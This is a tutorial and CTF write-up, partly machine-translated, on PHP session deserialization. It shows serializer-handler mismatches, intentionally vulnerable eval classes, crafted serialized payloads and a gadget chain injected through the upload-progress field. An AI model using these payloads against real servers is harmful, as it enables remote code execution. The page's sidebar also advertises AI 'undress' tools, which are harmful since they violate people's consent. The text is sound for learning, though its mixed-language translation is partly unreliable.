PHP のセッション逆シリアル化メカニズム
はじめに
php.ini には 3 つの設定項目があります:
session.save_path="" --设置session的存储路径 session.save_handler="" --设定用户自定义存储函数,如果想使用PHP内置会话存储机制之外的可以使用本函数(数据库等方式) session.auto_start boolen --指定会话模块是否在请求开始时启动一个会话,默认为0不启动 session.serialize_handler string --定义用来序列化/反序列化的处理器名字。默认使用php
上記のオプションは、PHP のセッション ストレージとシーケンス ストレージに関連しています。
xamppコンポーネントを使用したインストールでは、上記の設定項目は次のように設定されます:
session.save_path="D:\xampp\tmp" 表明所有的session文件都是存储在xampp/tmp下 session.save_handler=files 表明session是以文件的方式来进行存储的 session.auto_start=0 表明默认不启动session session.serialize_handler=php 表明session的默认序列话引擎使用的是php序列话引擎
上記の設定では、セッションのシリアル化エンジンを設定するためにデフォルトのPHPエンジンに加えて、session.serialize_handlerが使用されます。他のエンジンの場合も、異なるエンジンに対応するセッションは異なる方法で保存されます。
php_binary: 保存方法は、キー名+キー名+serialize()関数でシリアル化された値の長さに相当するASCII文字です
php: 保存方法は、キー名+縦棒+serialize()関数で処理した値 sequence
php_serialize(php>5.5.4): 保存方法は、serialize()関数でシリアル化した値をPHPでデフォルトで使用する
他のエンジンに変更したい場合は、コード ini_set('session.serialize_handler', '設定する必要があるエンジン'); を追加するだけです。サンプルコードは以下の通りです。
<?php ini_set('session.serialize_handler', 'php_serialize'); session_start(); // do something
保存機構
PHPにおけるセッションの内容はメモリに保存されるのではなく、ファイル形式で保存されます。保存方法は設定項目session.save_handlerによって決まります。デフォルトではファイルとして保存されます。
保存されるファイルはsess_sessionidに基づいた名前が付けられ、ファイルの内容はセッション値のシーケンス以降の内容になります。
私たちの環境がxamppであると仮定すると、デフォルトの構成は上記のようになります。
デフォルト設定では:
<?php session_start() $_SESSION['name'] = 'spoock'; var_dump(); ?>
最後のセッションは次のように保存され、表示されます:
PHPSESSID の値が jo86ud4jfvu81mbg28sl2s56c2 であり、xampp/tmp に保存されているファイル名が sess_jo86ud4jfvu81 であることがわかります。 mbg28sl 2s56c2、ファイルの内容 name|s:6:"spoock"; です。 name はキー値、s:6:"spoock"; はserialize("spoock") の結果です。
php_serialize エンジンの下:
<?php ini_set('session.serialize_handler', 'php_serialize'); session_start(); $_SESSION['name'] = 'spoock'; var_dump(); ?>
SESSION ファイルの内容は a:1:{s:4:"name";s:6:"spoock";} です。 php_serialize をシリアル化に使用する場合、a:1 が追加されます。同時に、php_serialize を使用すると、セッション内のキーと値の両方がシリアル化されます。
php_binary エンジンの下:
<?php ini_set('session.serialize_handler', 'php_binary'); session_start(); $_SESSION['name'] = 'spoock'; var_dump(); ?>
SESSION ファイルの内容は names:6:"spoock"; です。名前の長さは 4 なので、4 は ASCII テーブルの EOT に対応します。 php_binary の格納規則によると、最後のものは names:6:"spoock"; です。 (突然、ASCII 値 4 の文字が Web ページ上で表示できないことがわかりました。ASCII テーブルを自分で確認してください。)
シリアル化は使い方が簡単です
test.php
?php
class syclover{
var $func="";
function __construct() {
$this->func = "phpinfo()";
}
function __wakeup(){
eval($this->func);
}
}
unserialize($_GET['a']);
?>受信パラメータは次のようにシーケンスされています11行目変更。特定の文字列を渡し、それを syclover の例に逆シリアル化してから、eval() メソッドを実行できます。 localhost/test.php?a=O:8:"syclover":1:{s:4:"func";s:14:"echo "spoock";";} にアクセスします。逆シリアル化によって取得されるコンテンツは次のとおりです。
object(syclover)[1] public 'func' => string 'echo "spoock";' (length=14)
最後のページ出力は spoock で、定義した echo "spoock" メソッドが最終的に実行されたことを示します。
これは単純なシリアル化の脆弱性のデモンストレーションです
PHP セッションにおけるシリアル化の害
PHP でのセッションの実装には問題はありません。この害は主にプログラマによるセッションの不適切な使用によって引き起こされます。
保存された $_SESSION データを逆シリアル化するために PHP が使用するエンジンが、シリアル化に使用されるエンジンと異なる場合、データは正しく逆シリアル化されません。慎重に構築されたデータ パケットにより、プログラム検証をバイパスしたり、一部のシステム メソッドを実行したりすることが可能です。例:
$_SESSION['ryat'] = '|O:11:"PeopleClass":0:{}';上記の $_SESSION データは php_serialize を使用しており、最終的に保存されるコンテンツは a:1:{s:6:"spoock";s:24:"|O:11:"PeopleClass":0: { }";}。
しかし、私たちは php を選択し、最後に読み取られたコンテンツは次のとおりでした:
array (size=1)
'a:1:{s:6:"spoock";s:24:"' =>
object(__PHP_Incomplete_Class)[1]
public '__PHP_Incomplete_Class_Name' => string 'PeopleClass' (length=11)これは、php エンジンを使用する場合、php エンジンが key と value の間の区切り文字として | を使用し、次に a:1 を使用するためです。 {s:6:"spoock";s:24:" が SESSION キーとして使用され、O:11:"PeopleClass":0:{} が値として使用され、逆シリアル化されます。最終的に、次のようになります。 PeopleClas クラス
シリアル化と逆シリアル化に使用されるエンジンが異なることが、PHP セッション シリアル化の脆弱性の原因です
2 つのファイルで使用される SESSION エンジンが異なるため、脆弱性、
s1.php、php_serialize を使用してセッションを処理します
<?php ini_set('session.serialize_handler', 'php_serialize'); session_start(); $_SESSION["spoock"]=$_GET["a"];
us2.php、s1 にアクセスするときに php を使用してセッションを処理します
ini_set('session.serialize_handler', 'php');
session_start();
class lemon {
var $hi;
function __construct(){
$this->hi = 'phpinfo();';
}
function __destruct() {
eval($this->hi);
}
}、次のデータを送信します:
localhost/s1.php?a=|O:5:"lemon":1:{s:2:"hi";s:14:"echo "spoock";";}受信データはシリアル化されますphp_serialize によると、
ページ出力である us2.php にアクセスすると、spoock は構築した関数を正常に実行し、プログラムは PHP に従って SESSION 内のデータをデシリアライズします。逆シリアル化すると、lemon オブジェクトがインスタンス化され、最後にデストラクター内の eval() メソッドが実行されます。
在安恒杯中的一道题目就考察了这个知识点。题目中的关键代码如下:
class.php
<?php
highlight_string(file_get_contents(basename($_SERVER['PHP_SELF'])));
//show_source(__FILE__);
class foo1{
public $varr;
function __construct(){
$this->varr = "index.php";
}
function __destruct(){
if(file_exists($this->varr)){
echo "<br>文件".$this->varr."存在<br>";
}
echo "<br>这是foo1的析构函数<br>";
}
}
class foo2{
public $varr;
public $obj;
function __construct(){
$this->varr = '1234567890';
$this->obj = null;
}
function __toString(){
$this->obj->execute();
return $this->varr;
}
function __desctuct(){
echo "<br>这是foo2的析构函数<br>";
}
}
class foo3{
public $varr;
function execute(){
eval($this->varr);
}
function __desctuct(){
echo "<br>这是foo3的析构函数<br>";
}
}
?>index.php
<?php
ini_set('session.serialize_handler', 'php');
require("./class.php");
session_start();
$obj = new foo1();
$obj->varr = "phpinfo.php";
?>通过代码发现,我们最终是要通过foo3中的execute来执行我们自定义的函数。
那么我们首先在本地搭建环境,构造我们需要执行的自定义的函数。如下:
myindex.php
<?php
class foo3{
public $varr='echo "spoock";';
function execute(){
eval($this->varr);
}
}
class foo2{
public $varr;
public $obj;
function __construct(){
$this->varr = '1234567890';
$this->obj = new foo3();
}
function __toString(){
$this->obj->execute();
return $this->varr;
}
}
class foo1{
public $varr;
function __construct(){
$this->varr = new foo2();
}
}
$obj = new foo1();
print_r(serialize($obj));
?>在foo1中的构造函数中定义$varr的值为foo2的实例,在foo2中定义$obj为foo3的实例,在foo3中定义$varr的值为echo "spoock"。最终得到的序列话的值是
O:4:"foo1":1:{s:4:"varr";O:4:"foo2":2:{s:4:"varr";s:10:"1234567890";s:3:"obj";O:4:"foo3":1:{s:4:"varr";s:14:"echo "spoock";";}}}这样当上面的序列话的值写入到服务器端,然后再访问服务器的index.php,最终就会执行我们预先定义的echo "spoock";的方法了。
写入的方式主要是利用PHP中Session Upload Progress来进行设置,具体为,在上传文件时,如果POST一个名为PHP_SESSION_UPLOAD_PROGRESS的变量,就可以将filename的值赋值到session中,上传的页面的写法如下:
<form action="index.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
<input type="file" name="file" />
<input type="submit" />
</form>最后就会将文件名写入到session中,具体的实现细节可以参考PHP手册。
那么最终写入的文件名是|O:4:"foo1":1:{s:4:"varr";O:4:"foo2":2:{s:4:"varr";s:1:"1";s:3:"obj";O:4:"foo3":1:{s:4:"varr";s:12:"var_dump(1);";}}}。注意与本地反序列化不一样的地方是要在最前方加上|
但是我在进行本地测试的时候,发现无法实现安恒这道题目所实现的效果,但是最终的原理是一样的。
总结
通过对PHP中的SESSION的分析,对PHP中的SESSION的实现原理有了更加深刻的认识。这个PHP的SESSION问题也是一个很好的问题。上述的这篇文章不仅使大家PHP中的SESSION的序列化漏洞有一个认识,也有助于程序员加强在PHP中的SESSION机制的理解。
以上就是PHP 中 Session 反序列化机制的内容,更多相关内容请关注PHP中文网(www.php.cn)!
ホットAIツール
Undresser.AI Undress
リアルなヌード写真を作成する AI 搭載アプリ
AI Clothes Remover
写真から衣服を削除するオンライン AI ツール。
Undress AI Tool
脱衣画像を無料で
Clothoff.io
AI衣類リムーバー
Video Face Swap
完全無料の AI 顔交換ツールを使用して、あらゆるビデオの顔を簡単に交換できます。
人気の記事
ホットツール
メモ帳++7.3.1
使いやすく無料のコードエディター
SublimeText3 中国語版
中国語版、とても使いやすい
ゼンドスタジオ 13.0.1
強力な PHP 統合開発環境
ドリームウィーバー CS6
ビジュアル Web 開発ツール
SublimeText3 Mac版
神レベルのコード編集ソフト(SublimeText3)
ホットトピック
7675
15
1393
52
1207
24
91
11
Ubuntu および Debian 用の PHP 8.4 インストールおよびアップグレード ガイド
Dec 24, 2024 pm 04:42 PM
PHP 8.4 では、いくつかの新機能、セキュリティの改善、パフォーマンスの改善が行われ、かなりの量の機能の非推奨と削除が行われています。 このガイドでは、Ubuntu、Debian、またはその派生版に PHP 8.4 をインストールする方法、または PHP 8.4 にアップグレードする方法について説明します。
今まで知らなかったことを後悔している 7 つの PHP 関数
Nov 13, 2024 am 09:42 AM
あなたが経験豊富な PHP 開発者であれば、すでにそこにいて、すでにそれを行っていると感じているかもしれません。あなたは、運用を達成するために、かなりの数のアプリケーションを開発し、数百万行のコードをデバッグし、大量のスクリプトを微調整してきました。
PHP 開発用に Visual Studio Code (VS Code) をセットアップする方法
Dec 20, 2024 am 11:31 AM
Visual Studio Code (VS Code とも呼ばれる) は、すべての主要なオペレーティング システムで利用できる無料のソース コード エディター (統合開発環境 (IDE)) です。 多くのプログラミング言語の拡張機能の大規模なコレクションを備えた VS Code は、
JSON Web Tokens(JWT)とPHP APIでのユースケースを説明してください。
Apr 05, 2025 am 12:04 AM
JWTは、JSONに基づくオープン標準であり、主にアイデンティティ認証と情報交換のために、当事者間で情報を安全に送信するために使用されます。 1。JWTは、ヘッダー、ペイロード、署名の3つの部分で構成されています。 2。JWTの実用的な原則には、JWTの生成、JWTの検証、ペイロードの解析という3つのステップが含まれます。 3. PHPでの認証にJWTを使用する場合、JWTを生成および検証でき、ユーザーの役割と許可情報を高度な使用に含めることができます。 4.一般的なエラーには、署名検証障害、トークンの有効期限、およびペイロードが大きくなります。デバッグスキルには、デバッグツールの使用とロギングが含まれます。 5.パフォーマンスの最適化とベストプラクティスには、適切な署名アルゴリズムの使用、有効期間を合理的に設定することが含まれます。
PHPでHTML/XMLを解析および処理するにはどうすればよいですか?
Feb 07, 2025 am 11:57 AM
このチュートリアルでは、PHPを使用してXMLドキュメントを効率的に処理する方法を示しています。 XML(拡張可能なマークアップ言語)は、人間の読みやすさとマシン解析の両方に合わせて設計された多用途のテキストベースのマークアップ言語です。一般的にデータストレージに使用されます
母音を文字列にカウントするPHPプログラム
Feb 07, 2025 pm 12:12 PM
文字列は、文字、数字、シンボルを含む一連の文字です。このチュートリアルでは、さまざまな方法を使用してPHPの特定の文字列内の母音の数を計算する方法を学びます。英語の母音は、a、e、i、o、u、そしてそれらは大文字または小文字である可能性があります。 母音とは何ですか? 母音は、特定の発音を表すアルファベットのある文字です。大文字と小文字など、英語には5つの母音があります。 a、e、i、o、u 例1 入力:string = "tutorialspoint" 出力:6 説明する 文字列「TutorialSpoint」の母音は、u、o、i、a、o、iです。合計で6元があります
PHPでの後期静的結合を説明します(静的::)。
Apr 03, 2025 am 12:04 AM
静的結合(静的::) PHPで後期静的結合(LSB)を実装し、クラスを定義するのではなく、静的コンテキストで呼び出しクラスを参照できるようにします。 1)解析プロセスは実行時に実行されます。2)継承関係のコールクラスを検索します。3)パフォーマンスオーバーヘッドをもたらす可能性があります。
PHPマジックメソッド(__construct、__destruct、__call、__get、__setなど)とは何ですか?
Apr 03, 2025 am 12:03 AM
PHPの魔法の方法は何ですか? PHPの魔法の方法には次のものが含まれます。1。\ _ \ _コンストラクト、オブジェクトの初期化に使用されます。 2。\ _ \ _リソースのクリーンアップに使用される破壊。 3。\ _ \ _呼び出し、存在しないメソッド呼び出しを処理します。 4。\ _ \ _ get、dynamic属性アクセスを実装します。 5。\ _ \ _セット、動的属性設定を実装します。これらの方法は、特定の状況で自動的に呼び出され、コードの柔軟性と効率を向上させます。
